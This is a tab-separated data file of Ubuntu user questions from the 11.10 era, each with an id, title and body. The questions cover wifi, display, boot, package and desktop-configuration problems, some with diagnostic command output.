75952	how can i remove the im status entries from the messaging indicator ?	on 11.10 : i know how to remove the email & u1 entries using blacklist/remove from /usr/share/blablabla_youknowwhere but i see no entries or solutions on how to remove only the status entries , as i dont use any ims , only mail & u1 . i suspect its hardcoded , please let me be wrong . but if it is so , maybe someone enlightened got a diff/patch , although i fear it will lead to dependency hell ( compiling wise )
75956	`` server refused our key '' when logging into ubuntu on ec2 as a different user	we created an aws micro instance running ubuntu 10.04 , and we can putty in as the `` ubuntu '' user using the key pair just fine . now i 've created two new users , but when i try to putty into the instance using their usernames i get `` server refused our key '' . what 's going on ? is the keypair tied to the ubuntu user ? also , do we have to create a keypair for these users , or can they log in using a password ? or do we need to always putty in as `` ubuntu '' and then `` su - myusername '' ? or am i just missing something simple ?
75965	can ping , but not ssh	so i have networkmanager , connected to an ap on wlan1 . i have wlan0 connected to a adhoc network . i have firestarter sharing my inet on the adhoc . i have my ipod connected to wlan0 , ip 10.42.43.101. wlan0 link encap : ethernet hwaddr ac : xx:12:81:7f : xx inet addr:10.42.43.1 bcast:10.255.255.255 mask:255.0.0.0 wlan1 link encap : ethernet hwaddr 00 : xx : b3:98 : f2 : xx inet addr:10.0.1.61 bcast:10.0.1.255 mask:255.255.255.0 now , i can ping my jailbroken , ssh-enabled and running ipod touch : matt : ~ $ ping 10.42.43.101 ping 10.42.43.101 ( 10.42.43.101 ) 56 ( 84 ) bytes of data . 64 bytes from 10.42.43.101 : icmp_req=1 ttl=64 time=168 ms 64 bytes from 10.42.43.101 : icmp_req=2 ttl=64 time=256 ms 64 bytes from 10.42.43.101 : icmp_req=3 ttl=64 time=151 ms ^c -- - 10.42.43.101 ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 1999ms rtt min/avg/max/mdev = 151.465/191.979/256.316/46.003 but i can not ssh it : $ ssh root @ 10.42.43.101 -vv openssh_5.8p1 debian-1ubuntu3 , openssl 0.9.8o 01 jun 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 10.42.43.101 [ 10.42.43.101 ] port 22 . it just stays there till i ^c it.. here 's my routing : $ ip route show 10.0.1.0/24 dev wlan1 proto kernel scope link src 10.0.1.61 metric 2 10.0.1.0/24 dev wlan1 proto kernel scope link src 10.0.1.61 metric 319 169.254.0.0/16 dev vboxnet0 proto kernel scope link src 169.254.128.223 metric 204 10.0.0.0/8 dev wlan0 proto kernel scope link src 10.42.43.1 default via 10.0.1.1 dev wlan1 proto static default via 10.0.1.1 dev wlan1 metric 319
75967	nautilus windows are not focused when launched via hotkeys	when launching nautilus windows from terminal , keyboard shortcuts configured in the keyboard application , or via alt+f2 and then typing / , the resulting nautilus window is not focused . this is the opposite behavior of previous releases where the window would be focused , facilitating immediate use . is this behavior a bug or is there a setting to make the window gain focus like it did in previous releases ?
75969	ar9285 wifi on lenovo z570 not enabled	help please . installed ubuntu 11.10 32bit on lenovo ideapad z570 . when choosing network manager > enable wireless nothing happens . wifi not enabling tried the response of wireless problems with atheros ar9285 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) code output for : sudo lshw -class network *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : d0 : df:9a : a0 : c3:5a width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d0500000-d050ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : f0 : de : f1:72:0e:89 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.0.103 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:40 ioport:2000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : yes 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : yes 2 : phy0 : wireless lan soft blocked : no hard blocked : yes 3 : acer-wireless : wireless lan soft blocked : yes hard blocked : no
75970	installer tries to resize my recovery partition instead of the normal partition when installing alongside windows 7	when i try to install ubuntu alongside windows 7 ( using the option in `` install ubuntu 11.10 '' ) , it tries to split with my recovery partition , not the proper windows partition . if i try advanced settings , it shows that the amount of space used on the windows 7 partition is `` unknown '' and i can not resize it . if i try to make free space using easeus partition master on windows 7 it `` finds some error '' . chkdsk in windows found no errors . any suggestions ?
75973	desktop icons getting realigned and overlapped	i have a couple of icons on the ubuntu desktop ( 11.10 ) . every time after reboot the icons get realigned and icons are overlayed on one another . i have to adjust the icons again and again after reboot . btw , i am ubuntu 11.10 on dell mini . how do i solve this ?
75976	can not adjust headphone volume under xps 17	i am running ubuntu 11.10 under a dell xps 17 machine , i can not adjust the headphone using the master volume control . it 's either muted or the loudest . i have to use alsamixer to lower the loudest volume to make the headphone usable .
75977	mysql 5.5 ppa trustworthy ?	i found this ppa which features mysql 5.5 ( alongside php 5.3.8 packages.. ) : https : //launchpad.net/~nathan-renniewaldock/+archive/ppa seems to be working fine on my 11.10 ubuntu , ut i ca n't find anything on the person/group behind the release . is this ppa trustworthy ? do you know anything about `` nathan rennie-waldock '' ? is there any other alternative ?
75978	how to customize system preferences settings for all users	does anybody know how to apply a customized user settings to other existing or new users ? . something like a customized preferences settings for system wide so that everybody posses those settings and below will explain in clear what i actually ment . on every machine i will install the following : eclipse mysql query browser and admin mysql workbench oracle virtualbox thunderbird -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- - if i install them by apt , this will automatically create shortcuts in applications but when i build them from source or extract the tar ball , i will have to add new item at it 's relevant place going to system -- > preferences -- > main menu to make them available as a shortcuts and this settings are applied only for the account i login and perform them . how could i make this preferences settings for complete system wide which applies for all users ? or if there is a way to apply a customized user settings to other users will also be ok. any hint please ? thank you !
75982	the selected configuration for displays could not be applied	just installed 11.10 64bit and followed this guide to install the latest drivers for my radeon hd 4870 . i have a 24 '' and a 17 '' side by side . the larger screen is turned on by default , but the smaller one does n't work unless i mirror them . when i remove mirroring , the small screen is automatically disabled . i enable it , choose a resolution , and when i press apply i get : required virtual size does not fit available size : requested= ( 3200 , 1200 ) , minimum= ( 320 , 200 ) , maximum= ( 1920 , 1920 ) what am i doing wrong ?
75987	i modified gtk3 source code and recompiled : no effect	in ubuntu ( gnome ) there is absolutely no way the change the mouse wheel scroll rate for gtk applications . it is hard-coded in gtk and determined by a `` smart '' algorithm which dynamically depends on the window size . so i downloaded the source and found the function that returns the step value . i changed it to return a very small number first , and then 0 ( to see if it has any affect at all ) . i did ./configure make sudo make install as instructed by gtk website . it compiles with no problems ( i have the libraries ) bu then , i restart and it has absolutely no affect . my guess is ubuntu is still using the original gtk it shipped with . what do you think is wrong here ?
75990	is there a google+ notificator available as indicator in unity ?	i think it would be beautiful to have an indicator in unity tray , counting google+ notifications ( orange on black , like in google bar ) . where can i find it ?
75991	switch to external monitor by default when it is plugged in	i have thinkpad t510 with nvidia videocard and an external monitor connected via vga . i have a following usage pattern : turn on the laptop in the docking station below the desk take it out , open , wait while it loads log in , launch nvidia-settings , set the resolution of the external monitor to `` auto '' , set the resolution of the laptop to `` off '' put the laptop back below the desk , close the lid now unlock the computer and use it normally . needless to say , it 's quite annoying . the fact that with active vga connection bios output goes straight to external monitor bypassing laptop 's is even more annoying , because after kdm launches it switches back . i do n't want to save this configuration to xorg.conf because when i launch my laptop without external monitor i want it to work as expected .
75993	power management issues on a sony vaio vpceb1c5e	this is my first question here , i 'm a newbie . i 've just installed ubuntu 11.10 on my laptop sony vaio vpceb1c5e e-series . the hardware is : cpu : intel i5-430m ram : 2x2gb ddr3 ssd : crucial m4 64gb gpu : amd radeon hd5650m it seems like ubuntu super-stress my cpu or gpu because my fan is always moving fast ( faster than on windows 7 system ) and the cpu cores temp is higher than it was when using windows 7 . the two cores are aobout 4째c hotter , they 're at 53째c simply surfing the net with chrome . i wonder if there 's something i can do to lower the spinning of my fan that is noise-annoying me , or understand why ubuntu does this . the prpblem is that 'top ' shows me low percentage load on cpus , just about 3 % , 10 % ... but the cores are still hotter than they should .
75995	trouble with plymouth and suspend/hibernate on a dell optiplex gx520	there are two symptoms apparently related to an acpi issue on my computer , as none of these problems happen if i boot with acpi=off ( except then the system can not shut itself off or , in the case of suspend , recovers immediately ) . pc is dell optiplex gx520 sff and has an unused onboard dual-monitor integrated video and also an add-in pci video card ( nvidia quadro nvs 50 pci ) . the monitor is a hanns-g 1440x900 widescreen lcd connected to the add-in pci card . i need to run the machine this way because pc has no pci-express slot and something is very wrong with the onboard video ( cooling related ) , and the entire computer hangs on gpu faults if set to 1440x900 and a windowing graphics application ( like x windows ) uses the onboard video for very long . if i boot ubuntu without the acpi=off boot option , plymouth ( the ubuntu boot progress meter splash screen ) never shows up . also , if i try to suspend the pc after logging in , it will turn off but hang when i go to wake it up . also , the system will just hang if i try to hibernate it , and afterwards will not recover the session if i manually power it down and then back up . this happens even with acpi=ht btw . happens regardless of whether i am using the 2d or 3d unity shell . only if i use acpi=off however , do i ever see graphical plymouth ( hooray ! ) and hibernate works except i have to manually power down the system once the system halted message appears but it actually even recovers when i turn it back on ( suspend also works , although the machine never actually sleeps and immediately recovers to the locked session screen , all due to the consequences of disabling acpi ) . finding out that acpi is involved was a breakthrough . this problem happens when running with the nvidia proprietary driver , with the nouveau driver , and with the x.org nv driver under 11.10 oneiric ( did n't happen in 10.10 maverick , however ) . prior to my upgrade from 10.10 ( maverick ) to 11.04,11.10 ( oneiric ) , the x.org nv driver actually did suspend/recover the system just great , though for that alternate driver to run , i needed to remove the nouveau.modest=0 ( causing a non-graphical plymouth to display ) . in 11.10 , the nv video driver ( xserver-xorg-video-nv package ) has been removed from the distro by debian for lack of support from its authors , though it still can be manually installed with dpkg/aptitude and does actually still work otherwise just about fine . i 'm so upset it does n't help anymore ! the fact that a simple app . like plymouth is affected , which runs very early in the boot process , is encouraging . what other clues , advice , or other system information do you think might help crack this case ?
75997	how to get server motd on non-server install	is there a way to get the fancy motd that shows up on an ubuntu server install on my ubuntu alternate install ? like this : welcome to ubuntu 11.10 ( gnu/linux 3.0.0-12-server x86_64 ) * documentation : https : //help.ubuntu.com/11.10/serverguide/c system information as of sun nov 6 00:38:01 pdt 2011 system load : 0.0 processes : 88 usage of / : 0.8 % of 227.98gb users logged in : 0 memory usage : 14 % ip address for eth0 : 10.13.37.147 swap usage : 0 % graph this data and manage this system at https : //landscape.canonical.com/
75998	is it possible to have a different background for each workspace ?	i normally use 4 different workspaces for different things , and they are always the same , can i make a different background image for each one of them ? i would like an answer that works for both unity and the classic desktop . this question has multiple answers covering different ubuntu versions : 13.04 , 13.10 and 14.04 12.10 12.04 11.10 11.04 10.04
76000	what really light ubuntu releases are there ?	i want a really light ubuntu release so i get as much as possible out of my computer . i will only use this one for gaming , that 's why i need to get as much out of my laptop as possible . i want : low cpu usage low ram usage 11.04 11.10 64-bit please list only one release per answer .
76004	installer does n't recognize windows 8 partition , how do i set up a dual boot ?	i have a windows 8 dev preview install , with plenty of unused ( unpartitioned ) space on the hdd . however , the ubuntu installer ( from usb ) does n't recognise windows 8 - it says : this computer currently has no detected operating systems . what would you like to do ? with the option to either erase the disk , or do `` something else '' . if i choose the second option and select the `` free space '' area and `` install now '' i get : no root file system is defined . please correct this from the partitioning menu . so : is there anything good i can do here to run on-the-metal side-by-side ? the alternative is dropping one ( probably ubuntu , since windows 8 is already there ) into a vm .
76005	mathematica 8 constantly crashing when i rotate 3d graphics	mathematica 8 is consistently crashing on ubuntu 11.10 when i rotate 3d graphics . on ubuntu 11.04 it did not . i have intel gma 900 integrated graphics . did anyone encounter the same problem and manage to come up with a solution ( before a compatible version of mms is released ) ?
76007	my sound is distorted in doom3 . how can i fix it ?	i 'm using a fresh install of ubuntu 11.10 64-bit . i 've read the doom 3 guide here : https : //help.ubuntu.com/community/doom3 and installed doom 3 successfully . it runs but the sound is horrible ( very static-y ) . the terminal output is filled with these repeating lines : snd_pcm_writei 4096 frames failed : broken pipe preparing audio device for output snd_pcm_writei 4096 frames failed : broken pipe preparing audio device for output i 've tried using the following : doom3 +set s_driver oss +set s_numberofspeakers 2 but when i do there is no sound at all . this was in the terminal output : -- -- -- oss sound initialization -- -- -- warning : failed to open sound device '/dev/dsp ' : no such file or directory warning : sound subsystem disabled can anyone explain what the 'snd_pcm_writei 4096 frames failed : broken pipe ' error means and how to fix it so the sound plays normally ?
76008	can i share a tv card ?	my environment : 2 pcs , a desktop and a laptop , both on oneiric they are connected together by ethernet wire nfs-common is installed and configured : the desktop is the server a tv tuner card is installed on the desktop , i can watch tv with the software me-tv it works fine , tv on desktop , and my network too : i share folders thanks to nfs . but i would like more : how can i share my tv tuner card from the desktop and be able to watch tv on the laptop too ? if possible i would like a solution that allows me to keep using the software me-tv , on both pcs . i bet that there is a solution to create a fake tv card on the 2nd pc with xnbd . i 'm trying xnbd-server -- target /dev/dvb/adapter0/demux0 but i cant make it work . trying to understand some examples of xnbd command lines , it seems to be meant only for sharing disk player . if someone as ever used xnbd , he 's welcome .
76009	avoiding installation of certain dependency packages ( texlive )	as ubuntu 's texlive is quite old ( version 2009 ) , i always hear tex people recommending installing the latest texlive directly from ctan . ( yes , i need the same package mentioned in that question . ) i did this , and installed texlive 2011 . now some packages i need to install ( e.g . gummi ) depend on ubuntu 's texlive packages . how can i prevent ubuntu 's texlive packages from being installed since i already have a manually installed texlive ?
76010	how to execute privileged commands at system startup	i 'm using ubuntu 11.10 on thinkpad . every time the system starts , i have to run the following scripts with 'sudo ' to configure the device manually . # setting trackpoint trackpointdevicepath= '' /sys/devices/platform/i8042/serio4/serio5/ '' # set speed echo 255 > $ { trackpointdevicepath } speed # set sensitivity echo 255 > $ { trackpointdevicepath } sensitivity # adust screen brightness echo 0 > /sys/class/backlight/acpi_video0/brightness # disable touchpad synclient touchpadoff=1 i tried to put these commands in /etc/rc.local . but it did n't work because it needs root to run the commands . anyone can help me to run the privileged commands at system startup automatically ? or is there any convenient gui tool for device setting which can remember the settings ?
76013	how do i add locale to ubuntu server ?	i currently have those locales : locale -a c en_ag en_ag.utf8 en_au.utf8 en_bw.utf8 en_ca.utf8 en_dk.utf8 en_gb.utf8 en_hk.utf8 en_ie.utf8 en_in en_in.utf8 en_ng en_ng.utf8 en_nz.utf8 en_ph.utf8 en_sg.utf8 en_us.utf8 en_za.utf8 en_zw.utf8 posix how can i install ru_ru locale to my server ?
76014	not able to install c++ eclipse indigo after completely uninstalling	i had installed indigo eclipse successfully earlier in ubuntu ( virtual machine ) with following commands : sudo apt-get install eclipse sudo apt-get install eclipse-cdt however , it got messed up when i did an update from its `` install new software '' tab . after running following commands , i removed eclipse completely . sudo apt-get remove -- purge eclipse sudo apt-get autoremove sudo rm -rf /usr/bin/eclipse /usr/lib/eclipse/ /usr/share/eclipse /usr/share/man/man1/eclipse.1.gz /etc/eclipse.ini however , now i want to again install eclipse in my ubuntu . when i run the above commands , it simply does n't go well and stop at following execution : milind @ milind-virtualubuntuoneiric : ~ $ sudo apt-get install eclipse reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : eclipse 0 upgraded , 1 newly installed , 0 to remove and 147 not upgraded . need to get 0 b/17.3 kb of archives . after this operation , 131 kb of additional disk space will be used . warning : the following packages can not be authenticated ! eclipse install these packages without verification [ y/n ] ? y selecting previously deselected package eclipse . ( reading database ... 133931 files and directories currently installed . ) unpacking eclipse ( from ... /eclipse_3.7.0-0ubuntu1_all.deb ) ... setting up eclipse ( 3.7.0-0ubuntu1 ) ... milind @ milind-virtualubuntuoneiric : ~ $ trying for so long ( with restarting the vbox many times ) , but no luck . can you please help me with : how to install eclipse for c++ ( i think indigo ) from command line like earlier i did ? if command line is not working then what is the latest c++ eclipse site to get it ? how to install proper cdt for this eclipse so that it can be used nicely for debugging ( which was my root problem ) ?
76016	dual monitors not working with an nvidia card	even my main monitor is shown as unknown . i have tried setting up dual monitors using nvidia settings with no joy however it does recognize that i have 2 monitors . this was not an issue in 11.04 . my problem with the nvidia settings appears to be that my 2 monitors require different resolutions but even when i set them to a resolution that they both can handle , it is then only appearing in cloned mode . i really hope someone can help or i will have to roll back to 11.04 . why wo n't ubuntu 11.10 recognize that i have 2 monitors ? here is the contents of my xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ rothera ) thu aug 11 17:28:49 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : xconfig , vertrefresh source : xconfig identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 30.0 - 83.0 vertrefresh 50.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 7025 / nforce 630a '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt : 1280x1024 +1024+0 , dfp : 1024x768 +0+0 '' subsection `` display '' depth 24 endsubsection endsection '' ok i have tried disper -e. problem is that nvidia settings appear to be treating both monitors as the same one . so changing the settings to one has no effect , but change the other and it affects both screens identically . results of disper -l as follows : carter @ carter-desktop : ~ $ disper -l display dfp-0 : hp vs17 resolutions : 320x240 , 400x300 , 416x312 , 512x384 , 576x432 , 680x384 , 640x480 , 720x450 , 640x512 , 800x512 , 840x525 , 800x600 , 960x540 , 832x624 , 960x600 , 896x672 , 1024x768 , 1152x864 , 1280x960 , 1280x1024 display crt-0 : crt-0 resolutions : 320x240 , 400x300 , 416x312 , 512x384 , 576x432 , 680x384 , 640x480 , 720x450 , 640x512 , 800x512 , 840x525 , 800x600 , 960x540 , 832x624 , 960x600 , 896x672 , 1024x768 , 1152x864 , 1360x768 , 1280x960 , 1440x900 , 1280x1024 , 1400x1050 , 1600x1024 , 1680x1050 , 1600x1200 , 1920x1080 , 1920x1200 , 1792x1344 carter @ carter-desktop : ~ $
76017	how to make unity 2d show the whole application when clicking its icon ?	in unity 3d if i click on an application in the launcher all windows of that application get to the front . if i do the same in unity 2d only last active one used gets shown . is there a way to enable the same behaviour as in unity 3d ?
76018	how to open `` system > administrator '' -menu ?	ive come across many times to need to open the `` system > administrator '' -menu , but i havo no clue how ? i searched on google that youd need to press alt + f1 + s , but nothing happens ...
76020	how to make a custom ubuntu 11.10 64 bit installation dvd	i want to include some packages into ubuntu , the packages i want to add are ubuntu resticted extra ( mp3 codecs , wifi drivers ) 32 bit libraries ( ia32-lib ) kvm with gui ( for virtualization/emulation of android tv sdk , and windows ) eclipse gimp java 6 jre and jdk android sdk ( not available in usc and is not a package ) vlc if possible updates rhythmbox instead of banshee i need this custom installation dvd to distribute to particpants of android workshop and also helps me for reinstalling the os in case of any broken desktop , and saving almost 200mb of data usage everytime . update : i have tried uck , the package manager is not opening and returning error `` there is no package manager '' , even though synaptic package mannager is available
76024	42 '' panasonic being recognized as a 65 '' with an ati mobility hd 5400	ati mobility hd 5400 card with dual monitors - laptop and panasonic 42 '' plasma . was working fine in 11.04 but after upgrading to 11.10 is recognising 2nd monitor as 65 '' and will only display as 720p . showing all resolution selections but says 1920x1080 can not be displayed . is there an edit or command i can use to correct the problem ?
76025	dell inspiron n4010 with a bcm4313 wireless card not scanning/detecting access points	i have dell inspiron n4010 laptop with broadcomm 4313 wifi chip , and the driver for wifi is installed and i am able to switch on wifi , but it does not detect access points , even ad-hoc networks created to test.i dual booting ubuntu with windows and i had the same problem with 10.10 before , but a restart with wifi switched has solved the problem but not know.i am including the output of the following commands . saikiran @ saikiran-inspiron-n4010 : ~ $ sudo lshw -class network *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : 70 : f1 : a1:8b:7a:38 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.0.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f0300000-f0303fff *-network description : ethernet interface product : ar8152 v1.1 fast ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : c1 serial : b8 : ac:6f:5a:6f : a6 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : f0200000-f023ffff ioport:3000 ( size=128 ) saikiran @ saikiran-inspiron-n4010 : ~ $ iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off ppp0 no wireless extensions . saikiran @ saikiran-inspiron-n4010 : ~ $ rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no saikiran @ saikiran-inspiron-n4010 : ~ $ sudo iwlist scan [ sudo ] password for saikiran : lo interface does n't support scanning . eth0 interface does n't support scanning . wlan0 no scan results ppp0 interface does n't support scanning . does ubuntu scan for networks at the time of boot ? update : i reinstalled the os , while trying livecd wifi is working and detecting ap ( access points ) without installing properiteries drivers.after installing the same problem recurred . update : i reinstalled the os and driver and also installed ia32-libs , suddenly wifi detects access points , but some what erratic and have to restart with wifi off whenever it does not detect.sometimes when you switch off and on wifi , it is saying device not ready and i have to restart to make it work.can anyone explain the debacle .
76026	how to turn off scrolling emulation ?	how can i turn off mouse-wheel emulation with middle mouse button ? i need to use middle mouse shortcuts in blender and that feature covers middle mouse in all aplications . it is possible to turn it off just for blender ? because i think this feature is very useful in some applications . os : ubuntu 11.10 pc : lenovo thinkpad x200
76027	z-star vimicro webcam black white output instead of color	i 've just installed ubuntu 11.10 and i 've found that my webcam output is in black & white . in ubuntu 11.04 everything worked fine , now i 've tested my webcam with skype and cheese : neither is working properly ! any hint ? this is the output of lsusb : bus 002 device 004 : id 0ac8:301b z-star microelectronics corp. zc0301 webcam and here is an image captured from cheese ( misplaced colour channels ? )
76030	how do i copy files to and from my samsung gt-e2121 ?	i have a cell . your model is samsung gt-e2121 . when i connect it in my computer , the ubuntu know my mobile but i ca n't move any files to my cell or to my computer . help , i ca n't move my musics to my phone . thank you .
76032	replacement for foobar2000 's `` move files '' functionality ?	so i 'm a recent ubuntu convert and love it , but theres one thing i need help with : organising my music library . previously on windows i used foobar2000 , and had one playlist called `` incoming '' where i put all of my new music that had n't quite made it into my library , and when i decided it was good enough to make it into the collection i could select all the files , right click , `` move files ... '' , and then foobar could move or copy all the files , and accompanying album art into the library folder on my hard drive , into the relevant subfolder for album and artist , and re-name the files nicely . i realise i could probably duplicate this functionality by writing a shell script but i was wondering what other people do with regards to new music , and organising it ? i 'd be open to new ways of dealing with new music , perhaps some kind of auto playlist of recently added music , or automatic pruning of new music that i have n't listened to . i 'm currently using banshee to play my music but i 'm willing to change if needs be . thanks !
76036	problems installing from cd after computer went to sleep while downloading	i downloaded the iso image for ubuntu 11.10 and when i tried installing it did not work . it loads until where it shows you how the new ubuntu looks like . on the desktop and the launcher there are “buttons” for installing and whenever i click on any of those nothing happens no matter how long i wait . but whenever i click on anything else it opens , like the “settings” etc . i do n't know what the problem could be and i need your help . when i was downloading the image my computer went to sleep and i realised after many minutes that it had stopped downloading and was “asleep” . could this have affected the image to make it not install ? everything else in the disk seems ok except for the install buttons . help urgently , please .
76042	how can i add items to xfce root menu ?	i 'd like to add some items to my xfce `` root menu '' , see picture for location : searching the web gave a couple of possibilities ( different xml files etc ) , but it appears that xubuntu has customized it quite a bit . maybe i just overlooked the settings ? i also tried lxmenueditor , which does not access the root menus . where is the location of the configs for xubuntu ? would it be possible to get stock-xfce right click-on-desktop functionality without breaking anything ? by that i mean : right click on desktop and have the xfce menu instead of going through xubuntu 's submenu to access it . thanks for your time !
76044	apt-get upgrade , stops grub booting usb	i am attempting to setup a htpc , with ubuntu booting from usb and 3 sata disks as a raid array . i installed ubuntu 11.10 minimal to the usb device , everything was working ok for the first few hours , however after running apt-get upgrade , it no longer boots from grub2 ( the usual blinking cursor issue ) however , it boots fine if i disconnect the sata hdd in the machine ( so the usb device is the only boot device ) i am assuming ( correct me if i am wrong ) that the sata disk is being assigned /dev/sda and attempting to boot from hdd , and therefore the usb device is getting the wrong /dev/sdx ? other notes , the sata disks are unpartitioned and pressing shift during boot does not bring up the grub menu also . thank you for your time
76046	manual proxy configuration	how can i set the user and password , gui mode not terminal , for my proxy in oneiric ocelot ?
76050	how do i stop ubuntu from detaching minimize/maximuze/close buttons ?	some time ago i managed to get ubuntu to keep the window menubars in the menu rather than the bar above ( i 'm not sure if this part is unity or compiz , or what 's the difference ) . that was by removing indicator-appmenu anyway , so now everything is fine except one thing : if i have a window that is full screen , the minimize/maximize/close buttons are still grabbed by the bar on the top . usually this does n't cause a problem because the upper-left corner of the full screen window and the whole screen are not too far apart . however , one thing happens to me a lot , and that is i am working on something ( programming ) , then i need to check some things from other places so i open some windows , see what i want and switch back to my work . those windows however are temporary so at some point i want to close them . now here 's what happens : i have the focus on some window and i ca n't close the maximized window behind it unless i click on the window first , so that the buttons appear and then close it . i could n't find anything on the internet about this . is this something that 's hardcoded in unity/compiz/whatever or is there actually a way to configure this ?
76053	how to reset menu in gnome 3 ?	i have ubuntu 11.10 with gnome3 shell de . i have a problem , in the applications menu i ca n't find some applications like gparted , update-manager , gnome-tweak-tool that they can be run from terminal . i know that i can add launcher , but i do n't know how many other applications are n't show ! i have already proved this solutions : how do i reset gnome to the defaults ? but it does n't work . in unity everything is ok , can you help me please ?
76054	how to open terminal and embed terminal to nautilus file browser ?	never thought i might have to ask this , but this is my first linux installation , and i ca n't find the terminal . how do i open it ? and is there any way to open the bash from the file explorer , starting with the file explorer 's path as working path ? thank you , simon l .
76061	how do i automatically log into gnome 3 fallback mode instead of unity3d or gnome shell ?	is it possible to automatically login to gnome3 `` fallback '' mode in ubuntu 11.10 when starting up instead of unity3d by default ? i 've tried changing it at the login screen but it ignores my selection on the next reboot and defaults to unity . running on an underpowered notebook , fallback mode the only sane selection for the low specs of the system . any help will be appreciated .
76062	unity dashboard does not search applications	when i search for any application in the dashboard , it just returns files and folders matching my query . i have selected `` home '' button ( 1st button ) at the bottom . when i launch dashboard , i can see firefox icon in it but if i search for firefox , it returns nothing .
76065	how do i configure two network adapters in ubuntu server ?	i have two network adapters . how do i setup both adapters in ubuntu server for squid ? adapter 1 ( ip=192.168.2.100 subnet 255.255.255.0 default gateway 192.168.2.1 ) adapter 2 for my network switch which is connected to my user .
76066	ext4 disk partitions are not visible	i 'm a new user of the linux environment . i have just have installed ubuntu 11.10 on my system and i 'm unable to see the disk partition in which i have installed the os . size of the main disk is 100 gb and i want to see it back so that i can save my data in it . please help . the disk format is ext4 .
76070	i ca n't uninstall ironhide , or install any other packages	i installed ironhide ( aka bumblebee ) . it could n't get it to work , but now i ca n't uninstall the package and it 's preventing me from installing or removing anything else . any ideas what i can do to fix this problem ? $ sudo apt-get remove -f ironhide reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : virtualgl acpi-call-dkms virtualgl-libs easybashgui use 'apt-get autoremove ' to remove them . the following packages will be removed ironhide 0 upgraded , 0 newly installed , 1 to remove and 65 not upgraded . 1 not fully installed or removed . after this operation , 1,901 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 297969 files and directories currently installed . ) removing ironhide ... groupdel : group 'ironhide ' does not exist dpkg : error processing ironhide ( -- remove ) : subprocess installed post-removal script returned error exit status 6 processing triggers for ureadahead ... errors were encountered while processing : ironhide e : sub-process /usr/bin/dpkg returned an error code ( 1 )
76072	ca n't enable gnome shell extensions	i recently installed the media player indicator extension and all the extensions are blocked . i can not enable the ones that have been disabled earlier . i also tried to disable one of those which were enabled and restarted using alt + f2 + r and when i started advanced settings that extension was unable to start along the others . please see the output of running gnome-tweak-tool in a terminal here .
76077	how do i disable mnemonics in gtk3 ?	in natty narwhal i used to do some nifty tricks with .gtkrc-2.0 to disable mnemonics ( underlined menus ) but now it 's impossible . i assume in oneiric ocelot it will be something different because it uses gtk3 . i used to achieve this by adding the following lines : gtk-enable-accels = 0 gtk-enable-mnemonics = 0 how can i get rid of the mnemonics in oneiric ocelot ?
